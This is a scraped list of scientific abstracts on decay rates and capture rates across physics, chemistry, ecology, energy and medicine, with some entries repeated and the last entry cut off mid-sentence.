Proton-capture Nucleosynthesis In Low Mass Stars: Effects of New Reaction Rates SciTech Connect Palmerini, S.; Busso, M.; La Cognata, M.; Cristallo, S. 2011-10-28 We present computations of nucleosynthesis in low-mass asymptotic-giant-branch stars of solar metallicity experiencing deep mixing. In this framework, we discuss the effects of recent improvements in relevant reaction rates for proton captures on intermediate-mass nuclei. The calculations are then performed on the basis of a parameterized circulation, where the effects of the new nuclear inputs are best compared to previous works. We find that especially the new reaction rate for the {sup 14}N(p,{gamma}){sup 15}O reaction implies considerable modifications in the composition of low mass red giant stars. 5. Concentrations and decay rates of ozone in indoor air in dependence on building and surface materials. PubMed Moriske, H J; Ebert, G; Konieczny, L; Menk, G; Schöndube, M 1998-08-01 The decay of ozone in indoor air was measured in a closed chamber after contact with different building materials and residential surfaces. The tested materials were: vinyl wall paper, woodchip paper, plywood, latex paint, fitted carpet, and plaster. In the summer of 1996, the entry of ozone from ambient air into indoor air during ventilation and the ozone decay in indoor air, after windows had been closed again, were studied. Measurements were done in a residential house on the outskirts of Berlin. The following results were gained: the chamber measurements showed a decay of ozone after contact with most of the materials put inside the chamber. Higher decay rates have been obtained for wall papers, plywood, fitted carpet and plaster. As described in the literature, ozone is able to react with olefines inside the materials and is able to form formaldehyde and other components. This formation of formaldehyde could also be confirmed in our investigations. Thus, in most cases, the formaldehyde concentrations were lower than the German guideline value of 0.1 ppm. The formation of formaldehyde could be prevented when a special wall paper that was coated with activated carbon was used. In the house, a complete ozone diffusion into indoor air took place during ventilation within 30 min. After closing the windows, the ozone concentrations decreased to the basic level before ventilation within 60-90 min. 6. Absorption cross-section and decay rate of rotating linear dilaton black holes Sakalli, I.; Aslan, O. A. 2016-02-01 We analytically study the scalar perturbation of non-asymptotically flat (NAF) rotating linear dilaton black holes (RLDBHs) in 4-dimensions. We show that both radial and angular wave equations can be solved in terms of the hypergeometric functions. The exact greybody factor (GF), the absorption cross-section (ACS), and the decay rate (DR) for the massless scalar waves are computed for these black holes (BHs). The results obtained for ACS and DR are discussed through graphs. 7. Optimal decay rate for the wave equation on a square with constant damping on a strip Stahn, Reinhard 2017-04-01 We consider the damped wave equation with Dirichlet boundary conditions on the unit square parametrized by Cartesian coordinates x and y. We assume the damping a to be strictly positive and constant for x<σ and zero for x>σ . We prove the exact t^{-4/3}-decay rate for the energy of classical solutions. Our main result (Theorem 1) answers question (1) of Anantharaman and Léautaud (Anal PDE 7(1):159-214, 2014, Section 2C). 8. Initial cooperative decay rate and cooperative Lamb shift of resonant atoms in an infinite cylindrical geometry SciTech Connect Friedberg, Richard; Manassah, Jamal T. 2011-08-15 We obtain in both the scalar and vector photon models the analytical expressions for the initial cooperative decay rate and the cooperative Lamb shift for an ensemble of resonant atoms distributed uniformly in an infinite cylindrical geometry for the case that the initial state of the system is prepared in a phased state modulated in the direction of the cylindrical axis. We find that qualitatively the scalar and vector theories give different results. 9. Measurement of HOx• production rate due to radon decay in air SciTech Connect Ding, Huiling 1993-08-01 Radon in indoor air may cause the exposure of the public to excessive radioactivity. Radiolysis of water vapor in indoor air due to radon decay could produce (•OH and HO2 •) that may convert atmospheric constituents to compounds of lower vapor pressure. These lower vapor pressure compounds might then nucleate to form new particles in the indoor atmosphere. Chemical amplification was used to determine HOx• production rate in indoor air caused by radon decay. Average HOx• production rate was found to be (4.31±0.07) x 105 HOx• per Rn decay per second (Bq) 3.4 to 55.0% at 22C. This work provided G(HOx•)-value, 7.86±0.13 No./100 eV in air by directly measuring [HOx•] formed from the radiolysis procedure. This G value implies that HOx• produced by radon decay in air might be formed by multiple processes and may be result of positive ion-molecule reactions, primary radiolysis, and radical reactions. There is no obvious relation between HOx• production rate and relative humidity. A laser-induced fluorescence (LIF) system has been used for •OH production rate measurement; it consists of an excimer laser, a dye laser, a frequency doubler, a gaseous fluorescence chamber, and other optical and electronic parts. This system needs to be improved to eliminate the interferences of light scattering and artificial •OH produced from the photolysis of O3/H2O. 10. Measurement of the decay rate of single-frequency perturbations on blast waves. PubMed Edens, A D; Ditmire, T; Hansen, J F; Edwards, M J; Adams, R G; Rambo, P K; Ruggles, L; Smith, I C; Porter, J L 2005-12-09 To explore the validity of theories forwarded to explain the dynamics of hydrodynamic perturbations on high Mach number blast waves, we have studied the decay rate of perturbations on blast waves traveling through nitrogen gas. In our experiments, 1 kJ pulses from the Z-Beamlet laser at Sandia National Laboratories illuminated solid targets immersed in gas and created blast waves. The polytropic index implied by comparing experiment to theoretical predictions is compared to simulation results. 11. Excitonic coupling effect on the nonradiative decay rate in molecular aggregates: Formalism and application Li, Wenqiang; Zhu, Lili; Shi, Qiang; Ren, Jiajun; Peng, Qian; Shuai, Zhigang 2017-09-01 We present here an analytical thermal vibration correlation function formalism to calculate the nonradiative decay rate constant (knr) considering excitonic coupling effect (ECE) for molecular aggregates based on split-operator approximation. Combining with first-principles calculations, we found that knr is enhanced by ECE for both H- and J-aggregates. In addition, ECE is found to be minor for the AIEgens (aggregation-induced emission luminogens). 12. Estimation of HF artificial ionospheric turbulence characteristics using comparison of calculated plasma wave decay rates with the measured decay rates of the stimulated electromagnetic emission Bareev, D. D.; Gavrilenko, V. G.; Grach, S. M.; Sergeev, E. N. 2016-02-01 It is shown experimentally that the relaxation time of the stimulated electromagnetic emission (SEE) after the pump wave turn off decreases when frequency of the electromagnetic wave, responsible for the SEE generation (pump wave f0 or diagnostic wave fdw) approaches 4th harmonic of the electron cyclotron frequency fce . Since the SEE relaxation is determined by the damping rate of plasma waves with the same frequency, responsible for the SEE generation, we calculated damping rates of plasma waves with ω ∼ωuh (ω is the plasma wave frequency, ωuh is the upper hybrid frequency) for frequencies close to and distant from the double resonance where ωuh ∼ 4ωce (ωce = 2 πfce). The calculations were performed numerically on the base of linear plasma wave dispersion relation at arbitrary ratio between | Δ | = ω - 4ωce and |k‖ |VTe (VTe is the electron thermal speed and k‖ is the projection of the wave vector onto the magnetic field direction. A comparison of calculation and experimental results has shown that obtained frequency dependence of the SEE decay rate is similar to the damping rate frequency dependence for plasma waves with wave vectors directed at the angles 60-70° to the magnetic field, and gives a strong hint that oblique upper hybrid plasma waves should be responsible for the SEE generation. 13. Nonequilibrium capture rates induce protein accumulation and enhanced adsorption to solid-state nanopores. PubMed Freedman, Kevin J; Haq, Syed Raza; Fletcher, Michael R; Foley, Joe P; Jemth, Per; Edel, Joshua B; Kim, Min Jun 2014-12-23 Single molecule capturing of analytes using an electrically biased nanopore is the fundamental mechanism in which nearly all nanopore experiments are conducted. With pore dimensions being on the order of a single molecule, the spatial zone of sensing only contains approximately a zeptoliter of volume. As a result, nanopores offer high precision sensing within the pore but provide little to no information about the analytes outside the pore. In this study, we use capture frequency and rate balance theory to predict and study the accumulation of proteins at the entrance to the pore. Protein accumulation is found to have positive attributes such as capture rate enhancement over time but can additionally lead to negative effects such as long-term blockages typically attributed to protein adsorption on the surface of the pore. Working with the folded and unfolded states of the protein domain PDZ2 from SAP97, we show that applying short (e.g., 3-25 s in duration) positive voltage pulses, rather than a constant voltage, can prevent long-term current blockades (i.e., adsorption events). By showing that the concentration of proteins around the pore can be controlled in real time using modified voltage protocols, new experiments can be explored which study the role of concentration on single molecular kinetics including protein aggregation, folding, and protein binding. 14. Radiative decay rate of excitons in square quantum wells: Microscopic modeling and experiment SciTech Connect Khramtsov, E. S.; Grigoryev, P. S.; Ignatiev, I. V.; Verbin, S. Yu.; Belov, P. A. Efimov, Yu. P.; Eliseev, S. A.; Lovtcius, V. A.; Petrov, V. V.; Yakovlev, S. L. 2016-05-14 The binding energy and the corresponding wave function of excitons in GaAs-based finite square quantum wells (QWs) are calculated by the direct numerical solution of the three-dimensional Schrödinger equation. The precise results for the lowest exciton state are obtained by the Hamiltonian discretization using the high-order finite-difference scheme. The microscopic calculations are compared with the results obtained by the standard variational approach. The exciton binding energies found by two methods coincide within 0.1 meV for the wide range of QW widths. The radiative decay rate is calculated for QWs of various widths using the exciton wave functions obtained by direct and variational methods. The radiative decay rates are confronted with the experimental data measured for high-quality GaAs/AlGaAs and InGaAs/GaAs QW heterostructures grown by molecular beam epitaxy. The calculated and measured values are in good agreement, though slight differences with earlier calculations of the radiative decay rate are observed. 15. Direct Measurement of the Unimolecular Decay Rate of Criegee Intermediates to OH Products Liu, Fang; Fang, Yi; Klippenstein, Stephen; McCoy, Anne; Lester, Marsha Ozonolysis of alkenes is an important non-photolytic source of OH radicals in the troposphere. The production of OH radicals proceeds though formation and unimolecular decay of Criegee intermediates such as syn-CH3CHOO and (CH3)2COO. These alkyl-substituted Criegee intermediates can undergo a 1,4-H transfer reaction to form an energized vinyl hydroperoxide species, which breaks apart to OH and vinoxy products. Recently, this laboratory used IR excitation in the C-H stretch overtone region to initiate the unimolecular decay of syn-CH3CHOO and (CH3)2COO Criegee intermediates, leading to OH formation. Here, direct time-domain measurements are performed to observe the rate of appearance of OH products under collision-free conditions utilizing UV laser-induced fluorescence for detection. The experimental rates are in excellent agreement with statistical RRKM calculations using barrier heights predicted from high-level electronic structure calculations. Accurate determination of the rates and barrier heights for unimolecular decay of Criegee intermediates is essential for modeling the kinetics of alkene ozonolysis reactions, a significant OH radical source in atmospheric chemistry, as well as the steady-state concentration of Criegee intermediates in the atmosphere. This research was supported through the National Science Foundation under grant CHE-1362835. 16. ASSESSMENT OF THE RATES OF INJURY AND MORTALITY IN WATERFOWL CAPTURED WITH FIVE METHODS OF CAPTURE AND TECHNIQUES FOR MINIMIZING RISKS. PubMed O'Brien, Michelle F; Lee, Rebecca; Cromie, Ruth; Brown, Martin J 2016-04-01 Swan pipes, duck decoys, cage traps, cannon netting, and roundups are widely used to capture waterfowl in order to monitor populations. These methods are often regulated in countries with national ringing or banding programs and are considered to be safe, and thus justifiable given the benefits to conservation. However, few published studies have addressed how frequently injuries and mortalities occur, or the nature of any injuries. In the present study, rates of mortality and injury during captures with the use of these methods carried out by the Wildfowl & Wetlands Trust as part of conservation programs were assessed. The total rate of injury (including mild dermal abrasions) was 0.42% across all species groups, whereas total mortality was 0.1% across all capture methods. Incidence of injury varied among species groups (ducks, geese, swans, and rails), with some, for example, dabbling ducks, at greater risk than others. We also describe techniques used before, during, and after a capture to reduce stress and injury in captured waterfowl. Projects using these or other capture methods should monitor and publish their performance to allow sharing of experience and to reduce risks further. 17. Measurement of the solar neutrino capture rate with gallium metal, part III SciTech Connect Elliott, Steven Ray 2008-01-01 The Russian-American experiment SAGE began to measure the solar neutrino capture rate with a target of gallium metal in December 1989. Measurements have continued with only a few brief interruptions since that time. In this article we present the experimental improvements in SAGE since its last published data summary in December 2001. Assuming the solar neutrino production rate was constant during the period of data collection, combined analysis of 168 extractions through December 2007 gives a capture rate of solar neutrinos with energy more than 233 keY of 65.4{sup +3.1}{sub 3.0} (stat) {sup +2.6}{sub -2.8} (syst) SNU. The weighted average of the results of all three Ga solar neUlrino experiments, SAGE, Gallex, and GNO, is now 66.1 {+-} 3.1 SNU, where statistical and systematic uncertainties have been combined in quadrature. During the recent period of data collection a new test of SAGE was made with a reactor-produced {sup 37}Ar neutrino source. The ratio of observed to calculated rates in this experiment, combined with the measured rates in the three prior {sup 51}Cr neutrino-source experiments with Ga, is 0.88 {+-} 0.05. A probable explanation for this low result is that the cross section for neutrino capture by the two lowest-lying excited states in {sup 71}Ge has been overestimated. If we assume these cross sections are zero, then the standard solar model including neutrino oscillations predicts a total capture rate in Ga in the range of 63--67 SNU with an uncertainly of about 5%, in good agreement with experiment. We derive the current value of the pp neutrino flux produced in the Sun to be {phi}{sup {circle_dot}}{sub pp} = (6.1 {+-} 0.8) x 10{sup 10}/(cm{sup 2} s), which agrees well with the flux predicted by the standard solar model. Finally, we make several tests and show that the data are consistent with the assumption that the solar neutrino production rate is constant in time. 18. Stellar electron capture rates on neutron-rich nuclei and their impact on stellar core collapse 2017-02-01 During the late stages of gravitational core-collapse of massive stars, extreme isospin asymmetries are reached within the core. Due to the lack of microscopic calculations of electron-capture (EC) rates for all relevant nuclei, in general simple analytic parametrizations are employed. We study here several extensions of these parametrizations, allowing for a temperature, electron density, and isospin dependence as well as for odd-even effects. The latter extra degrees of freedom considerably improve the agreement with large-scale microscopic rate calculations. We find, in particular, that the isospin dependence leads to a significant reduction of the global EC rates during core collapse with respect to fiducial results, where rates optimized on calculations of stable f p -shell nuclei are used. Our results indicate that systematic microscopic calculations and experimental measurements in the N ≈50 neutron-rich region are desirable for realistic simulations of the core collapse. 19. Electron capture and positron decay of /sup 206/Fr and /sup 208/Fr and the energy levels of /sup 206/Rn and /sup 208/Rn SciTech Connect Ritchie, B.G.; Avignone, F.T. III; Carter, H.K.; Mlekodaj, R.L.; Spejewski, E.H. 1981-04-01 The isotopes /sup 206/Fr and /sup 208/Fr were produced by the reactions Ir(/sup 20/Ne,xn)/sup 206,208/Fr and mass separated on-line. The electron-capture and positron decays to /sup 206/Rn and /sup 208/Rn were studied by collecting ..gamma.. ray and internal conversion electron singles spectra as a function of decay time as well as ..gamma..-..gamma.., ..gamma..-e/sup -/, and ..gamma..-x ray coincidence spectra. The energies and many of the spins were determined for 18 excited, even parity states in /sup 208/Rn and for 10 excited, even parity states in /sup 206/Rn. These nuclei appear to be excellent candidates for interpretation in terms of a weak coupling shell model. The energy levels were also compared to the predictions of the interacting boson approximation model. 20. Radionuclide mass inventory, activity, decay heat, and dose rate parametric data for TRIGA spent nuclear fuels SciTech Connect Sterbentz, J.W. 1997-03-01 Parametric burnup calculations are performed to estimate radionuclide isotopic mass and activity concentrations for four different Training, Research, and Isotope General Atomics (TRIGA) nuclear reactor fuel element types: (1) Aluminum-clad standard, (2) Stainless Steel-clad standard, (3) High-enrichment Fuel Life Improvement Program (FLIP), and (4) Low-enrichment Fuel Life Improvement Program (FLIP-LEU-1). Parametric activity data are tabulated for 145 important radionuclides that can be used to generate gamma-ray emission source terms or provide mass quantity estimates as a function of decay time. Fuel element decay heats and dose rates are also presented parametrically as a function of burnup and decay time. Dose rates are given at the fuel element midplane for contact, 3.0-feet, and 3.0-meter detector locations in air. The data herein are estimates based on specially derived Beginning-of-Life (BOL) neutron cross sections using geometrically-explicit TRIGA reactor core models. The calculated parametric data should represent good estimates relative to actual values, although no experimental data were available for direct comparison and validation. However, because the cross sections were not updated as a function of burnup, the actinide concentrations may deviate from the actual values at the higher burnups. 1. Nuclear mass inventory, photon dose rate and thermal decay heat of spent research reactor fuel assemblies SciTech Connect Pond, R.B.; Matos, J.E. 1996-12-31 This document has been prepared to assist research reactor operators possessing spent fuel containing enriched uranium of United States origin to prepare part of the documentation necessary to ship this fuel to the United States. Data are included on the nuclear mass inventory, photon dose rate, and thermal decay heat of spent research reactor fuel assemblies. Isotopic masses of U, Np, Pu and Am that are present in spent research reactor fuel are estimated for MTR, TRIGA and DIDO-type fuel assembly types. The isotopic masses of each fuel assembly type are given as functions of U-235 burnup in the spent fuel, and of initial U-235 enrichment and U-235 mass in the fuel assembly. Photon dose rates of spent MTR, TRIGA and DIDO-type fuel assemblies are estimated for fuel assemblies with up to 80% U-235 burnup and specific power densities between 0.089 and 2.857 MW/kg[sup 235]U, and for fission product decay times of up to 20 years. Thermal decay heat loads are estimated for spent fuel based upon the fuel assembly irradiation history (average assembly power vs. elapsed time) and the spent fuel cooling time. 2. A realistic model of neutrino masses with a large neutrinoless double beta decay rate 2012-05-01 The minimal Standard Model extension with the Weinberg operator does accommodate the observed neutrino masses and mixing, but predicts a neutrinoless double beta (0 νββ) decay rate proportional to the effective electron neutrino mass, which can be then arbitrarily small within present experimental limits. However, in general 0 νββ decay can have an independent origin and be near its present experimental bound; whereas neutrino masses are generated radiatively, contributing negligibly to 0 νββ decay. We provide a realization of this scenario in a simple, well defined and testable model, with potential LHC effects and calculable neutrino masses, whose two-loop expression we derive exactly. We also discuss the connection of this model to others that have appeared in the literature, and remark on the significant differences that result from various choices of quantum number assignments and symmetry assumptions. In this type of models lepton flavor violating rates are also preferred to be relatively large, at the reach of foreseen experiments. Interestingly enough, in our model this stands for a large third mixing angle, {{si}}{{{n}}^{{2}}}{θ_{{{13}}}}{˜}}}{ > }}0.00{8} , when μ→ eee is required to lie below its present experimental limit. 3. Combined Results on b-Hadron Production Rates and Decay Properties SciTech Connect Su, Dong 2002-09-11 Combined results on b-hadron lifetimes, b-hadron production rates, B{sub d}{sup 0}-{bar B}{sub d}{sup 0} and B{sub s}{sup 0}-{bar B}{sub s}{sup 0} oscillations, the decay width difference between the mass eigenstates of the B{sub s}{sup 0}-{bar B}{sub s}{sup 0} system, the average number of c and {bar c} quarks in b-hadron decays, and searches for CP violation in the B{sub d}{sup 0}-{bar B}{sub d}{sup 0} system are presented. They have been obtained from published and preliminary measurements available in Summer 2000 from the ALEPH, CDF, DELPHI, L3, OPAL and SLD Collaborations. These results have been used to determine the parameters of the CKM unitarity triangle. 4. Variation in radical decay rates in epoxy as a function of crosslink density NASA Technical Reports Server (NTRS) Kent, G. M.; Memory, J. M.; Gilbert, R. D.; Fornes, R. E. 1983-01-01 A study was made of the behavior of radicals generated by Co-60 gamma radiation in the epoxy system tetraglycidyl-4,4'-diaminodiphenyl methane (TGDDM) cured with 4,4'-diaminodiphenyl sulfone (DDS). The molar ratio of TGDDM to DDS was varied in the epoxy samples, and they were prepared under the same curing conditions to obtain various extents of crosslinking. ESR spectrometry data suggest that the rate of decay of radicals is related to inhomogeneities in the resin, with radicals in the highly crosslinked regions having long decay times. The inhomogeneities are thought to be due to statistical variation associated with the complex crosslinking reactions or to difficulties in mixing the reactants. 5. Nucleation rates of Lennard-Jones clusters from growth and decay simulations Vehkamäki, Hanna; Ford, Ian J. 2000-08-01 We have studied singles clusters of Lennard-Jones atoms using a novel Monte Carlo simulation technique. We computed canonical ensemble averages of the grand canonical growth and decay probabilities of the cluster as a function of the cluster size. The critical size is identified as the one for which growth and decay are equally probable. The size and average internal energy the critical cluster was found for different temperatures and vapor chemical potentials. We used this information together with nucleation theorems to predict the behavior of the nucleation rate as function of the two external parameters. Our results are in line with the results found in the literature, and roughly correspond to the predictions of classical theory. 6. Initial colonization, community assembly and ecosystem function: fungal colonist traits and litter biochemistry mediate decay rate. PubMed Cline, Lauren C; Zak, Donald R 2015-10-01 Priority effects are an important ecological force shaping biotic communities and ecosystem processes, in which the establishment of early colonists alters the colonization success of later-arriving organisms via competitive exclusion and habitat modification. However, we do not understand which biotic and abiotic conditions lead to strong priority effects and lasting historical contingencies. Using saprotrophic fungi in a model leaf decomposition system, we investigated whether compositional and functional consequences of initial colonization were dependent on initial colonizer traits, resource availability or a combination thereof. To test these ideas, we factorially manipulated leaf litter biochemistry and initial fungal colonist identity, quantifying subsequent community composition, using neutral genetic markers, and community functional characteristics, including enzyme potential and leaf decay rates. During the first 3 months, initial colonist respiration rate and physiological capacity to degrade plant detritus were significant determinants of fungal community composition and leaf decay, indicating that rapid growth and lignolytic potential of early colonists contributed to altered trajectories of community assembly. Further, initial colonization on oak leaves generated increasingly divergent trajectories of fungal community composition and enzyme potential, indicating stronger initial colonizer effects on energy-poor substrates. Together, these observations provide evidence that initial colonization effects, and subsequent consequences on litter decay, are dependent upon substrate biochemistry and physiological traits within a regional species pool. Because microbial decay of plant detritus is important to global C storage, our results demonstrate that understanding the mechanisms by which initial conditions alter priority effects during community assembly may be key to understanding the drivers of ecosystem-level processes. © 2015 John Wiley & Sons Ltd. 7. Instrument for precision long-term β-decay rate measurements SciTech Connect Ware, M. J. Bergeson, S. D.; Ellsworth, J. E.; Groesbeck, M.; Hansen, J. E.; Pace, D.; Peatross, J. 2015-07-15 We describe an experimental setup for making precision measurements of relative β-decay rates of {sup 22}Na, {sup 36}Cl, {sup 54}Mn, {sup 60}Co, {sup 90}Sr, {sup 133}Ba, {sup 137}Cs, {sup 152}Eu, and {sup 154}Eu. The radioactive samples are mounted in two automated sample changers that sequentially position the samples with high spatial precision in front of sets of detectors. The set of detectors for one sample changer consists of four Geiger-Müller (GM) tubes and the other set of detectors consists of two NaI scintillators. The statistical uncertainty in the count rate is few times 0.01% per day for the GM detectors and about 0.01% per hour on the NaI detectors. The sample changers, detectors, and associated electronics are housed in a sealed chamber held at constant absolute pressure, humidity, and temperature to isolate the experiment from environmental variations. The apparatus is designed to accumulate statistics over many years in a regulated environment to test recent claims of small annual variations in the decay rates. We demonstrate that absent this environmental regulation, uncontrolled natural atmospheric pressure variations at our location would imprint an annual signal of 0.1% on the Geiger-Müller count rate. However, neither natural pressure variations nor plausible indoor room temperature variations cause a discernible influence on our NaI scintillator detector count rate. 8. Precision long-term measurements of beta-decay-rate ratios in a controlled environment Bergeson, S. D.; Peatross, J.; Ware, M. J. 2017-04-01 We report on measurements of relative beta-decay rates of Na-22, Cl-36, Co-60, Sr-90, Cs-137 monitored for more than one year. The radioactive samples are mounted in an automated sample changer that sequentially positions the five samples in turn, with high spatial precision, in front of each of four Geiger-Müller tubes. The sample wheel, detectors, and associated electronics are housed inside a sealed chamber held at constant absolute pressure, humidity, and temperature to isolate the experiment from environmental variations. The statistical uncertainty in the count rate approaches a few times 0.01% with two weeks of averaging. Other sources of error are on a similar scale. The data are analyzed in variety of ways, comparing count rates of the various samples on one or more detectors, and comparing count rates of a particular sample across multiple detectors. We observe no statistically significant variations in the ratios of decay rates, either annual or at higher-frequency, at a level above 0.01%. 9. Instrument for precision long-term β-decay rate measurements. PubMed Ware, M J; Bergeson, S D; Ellsworth, J E; Groesbeck, M; Hansen, J E; Pace, D; Peatross, J 2015-07-01 We describe an experimental setup for making precision measurements of relative β-decay rates of (22)Na, (36)Cl, (54)Mn, (60)Co, (90)Sr, (133)Ba, (137)Cs, (152)Eu, and (154)Eu. The radioactive samples are mounted in two automated sample changers that sequentially position the samples with high spatial precision in front of sets of detectors. The set of detectors for one sample changer consists of four Geiger-Müller (GM) tubes and the other set of detectors consists of two NaI scintillators. The statistical uncertainty in the count rate is few times 0.01% per day for the GM detectors and about 0.01% per hour on the NaI detectors. The sample changers, detectors, and associated electronics are housed in a sealed chamber held at constant absolute pressure, humidity, and temperature to isolate the experiment from environmental variations. The apparatus is designed to accumulate statistics over many years in a regulated environment to test recent claims of small annual variations in the decay rates. We demonstrate that absent this environmental regulation, uncontrolled natural atmospheric pressure variations at our location would imprint an annual signal of 0.1% on the Geiger-Müller count rate. However, neither natural pressure variations nor plausible indoor room temperature variations cause a discernible influence on our NaI scintillator detector count rate. 10. Instrument for precision long-term β-decay rate measurements Ware, M. J.; Bergeson, S. D.; Ellsworth, J. E.; Groesbeck, M.; Hansen, J. E.; Pace, D.; Peatross, J. 2015-07-01 We describe an experimental setup for making precision measurements of relative β-decay rates of 22Na, 36Cl, 54Mn, 60Co, 90Sr, 133Ba, 137Cs, 152Eu, and 154Eu. The radioactive samples are mounted in two automated sample changers that sequentially position the samples with high spatial precision in front of sets of detectors. The set of detectors for one sample changer consists of four Geiger-Müller (GM) tubes and the other set of detectors consists of two NaI scintillators. The statistical uncertainty in the count rate is few times 0.01% per day for the GM detectors and about 0.01% per hour on the NaI detectors. The sample changers, detectors, and associated electronics are housed in a sealed chamber held at constant absolute pressure, humidity, and temperature to isolate the experiment from environmental variations. The apparatus is designed to accumulate statistics over many years in a regulated environment to test recent claims of small annual variations in the decay rates. We demonstrate that absent this environmental regulation, uncontrolled natural atmospheric pressure variations at our location would imprint an annual signal of 0.1% on the Geiger-Müller count rate. However, neither natural pressure variations nor plausible indoor room temperature variations cause a discernible influence on our NaI scintillator detector count rate. 11. Aftershock decay, productivity, and stress rates in Hawaii: Indicators of temperature and stress from magma sources USGS Publications Warehouse Klein, Fred W.; Wright, Tom; Nakata, Jennifer 2006-01-01 We examined dozens of aftershock sequences in Hawaii in terms of Gutenberg-Richter and modified Omori law parameters. We studied p, the rate of aftershock decay; Ap, the aftershock productivity, defined as the observed divided by the expected number of aftershocks; and c, the time delay when aftershock rates begin to fall. We found that for earthquakes shallower than 20 km, p values >1.2 are near active magma centers. We associate this high decay rate with higher temperatures and faster stress relaxation near magma reservoirs. Deep earthquakes near Kilauea's inferred magma transport path show a range of p values, suggesting the absence of a large, deep magma reservoir. Aftershock productivity is >4.0 for flank earthquakes known to be triggered by intrusions but is normal (0.25 to 4.0) for isolated main shocks. We infer that continuing, post-main shock stress from the intrusion adds to the main shock's stress step and causes higher Ap. High Ap in other zones suggests less obvious intrusions and pulsing magma pressure near Kilauea's feeding conduit. We calculate stress rates and stress rate changes from pre-main shock and aftershock rates. Stress rate increased after many intrusions but decreased after large M7–8 earthquakes. Stress rates are highest in the seismically active volcano flanks and lowest in areas far from volcanic centers. We found sequences triggered by intrusions tend to have high Ap, high (>0.10 day) c values, a stress rate increase, and sometimes a peak in aftershock rate hours after the main shock. We interpret these values as indicating continuing intrusive stress after the main shock. 12. On the Fourier spectrum analysis of the solar neutrino capture rate Haubold, H. J.; Gerth, E. 1990-06-01 Periodic variations in Davis' experimental data concerning the solar neutrino capture rate are derived on the basis of a Fourier spectrum analysis. Variations in the Ar-37 production rate are obtained for a series of randomly spaced observations in the period 1970-1985 (runs 18-89). The harmonic analysis of runs 18-89 has determined solar neutrino capture rate variations with periods of 8.33, 5.00, 2.13, 1.61, 0.83, 0.61, 0.54, and 0.51 yr, thereby confirming earlier calculations performed for the set of runs 18-69 (1983), 18.74 (1985a), and 18-80 (1985b). The results also confirm those of Sakurai (1979) who showed that there is strong evidence that the observed solar neutrino flux has a tendency to vary with quasi-biennial periodicity. It is shown that the results of the Fourier spectrum analysis do not depend upon certain high or low values in Davis' experimental data. 13. Radiative and nonradiative spontaneous decay rates for an electric quadrupole source in the vicinity of a spherical particle SciTech Connect Guzatov, D. V. 2016-04-15 Analytic expressions for the radiative and nonradiative decay rates for an electric quadrupole source (atom, molecule) in the vicinity of a spherical particle (dielectric, metal) have been derived and analyzed within the classical electrodynamics. It has been shown that the highest increase in the decay rates appears in the quasi-static case, when the wavelength of the transition in question is much larger than the characteristic size of the system formed by the particle and the quadrupole. Asymptotic expressions for the decay rates have been derived for this case. 14. Decay rate of critical fluctuations in ethane+carbon dioxide mixtures near the critical line including the critical azeotrope SciTech Connect Chang, R.F.; Doiron, T.; Pegg, I.L.; Hanley, H.J.M.; Cezairliyan, A. 1986-03-01 Using the technique of photon correlation spectroscopy we have measured the decay rate of critical fluctuations in mixtures of ethane and carbon dioxide of various compositions including a near-azeotropic mixture. Our experimental data indicate that there is only one dominant mode of fluctuations and the decay rate is well described by the predictions of the mode-coupling theory with the exponent v=0.63 for all compositions. The decay rate, its background contributions, the shear viscosity, and the correlation length for the mixtures appear to interpolate simply between those of ethane and carbon dioxide. 15. Optimal Decay Rate of the Compressible Navier-Stokes-Poisson System in {mathbb {R}^3} Li, Hai-Liang; Matsumura, Akitaka; Zhang, Guojing 2010-05-01 The compressible Navier-Stokes-Poisson (NSP) system is considered in {mathbb {R}^3} in the present paper, and the influences of the electric field of the internal electrostatic potential force governed by the self-consistent Poisson equation on the qualitative behaviors of solutions is analyzed. It is observed that the rotating effect of electric field affects the dispersion of fluids and reduces the time decay rate of solutions. Indeed, we show that the density of the NSP system converges to its equilibrium state at the same L 2-rate {(1+t)^{-frac {3}{4}}} or L ∞-rate (1 + t)-3/2 respectively as the compressible Navier-Stokes system, but the momentum of the NSP system decays at the L 2-rate {(1+t)^{-frac {1}{4}}} or L ∞-rate (1 + t)-1 respectively, which is slower than the L 2-rate {(1+t)^{-frac {3}{4}}} or L ∞-rate (1 + t)-3/2 for compressible Navier-Stokes system [Duan et al., in Math Models Methods Appl Sci 17:737-758, 2007; Liu and Wang, in Comm Math Phys 196:145-173, 1998; Matsumura and Nishida, in J Math Kyoto Univ 20:67-104, 1980] and the L ∞-rate (1 + t)- p with {p in (1, 3/2)} for irrotational Euler-Poisson system [Guo, in Comm Math Phys 195:249-265, 1998]. These convergence rates are shown to be optimal for the compressible NSP system. 16. Comparing the effectiveness of heat rate improvements in different coal-fired power plants utilizing carbon dioxide capture Walsh, Martin Jeremy New Congressional legislation may soon require coal-fired power generators to pay for their CO2 emissions and capture a minimum level of their CO2 output. Aminebased CO2 capture systems offer plants the most technically proven and commercially feasible option for CO2 capture at this time. However, these systems require a large amount of heat and power to operate. As a result, amine-based CO2 capture systems significantly reduce the net power of any units in which they are installed. The Energy Research Center has compiled a list of heat rate improvements that plant operators may implement before installing a CO2 capture system. The goal of these improvements is to upgrade the performance of existing units and partially offset the negative effects of adding a CO2 capture system. Analyses were performed in Aspen Plus to determine the effectiveness of these heat rate improvements in preserving the net power and net unit heat rate (NUHR) of four different power generator units. For the units firing high-moisture sub-bituminous coal, the heat rate improvements reduced NUHR by an average of 13.69% across a CO 2 capture level range of 50% to 90%. For the units firing bituminous coal across the same CO2 capture range, the heat rate improvements reduced NUHR by an average of 12.30%. Regardless of the units' coal or steam turbine cycle type, the heat rate improvements preserved 9.7% to 11.0% of each unit's net power across the same CO2 capture range. In general, the heat rate improvements were found to be most effective in improving the performance of units firing high-moisture sub-bituminous. The effect of the CO2 capture system on these units and the reasons for the improvements' greater effectiveness in them are described in this thesis. 17. An equivalent dissipation rate model for capturing history effects in non-premixed flames DOE PAGES Kundu, Prithwish; Echekki, Tarek; Pei, Yuanjiang; ... 2016-11-11 18. An equivalent dissipation rate model for capturing history effects in non-premixed flames SciTech Connect Kundu, Prithwish; Echekki, Tarek; Pei, Yuanjiang; Som, Sibendu 2016-11-11 19. Features of Heart Rate Variability Capture Regulatory Changes During Kangaroo Care in Preterm Infants. PubMed Kommers, Deedee R; Joshi, Rohan; van Pul, Carola; Atallah, Louis; Feijs, Loe; Oei, Guid; Bambang Oetomo, Sidarto; Andriessen, Peter 2017-03-01 To determine whether heart rate variability (HRV) can serve as a surrogate measure to track regulatory changes during kangaroo care, a period of parental coregulation distinct from regulation within the incubator. Nurses annotated the starting and ending times of kangaroo care for 3 months. The pre-kangaroo care, 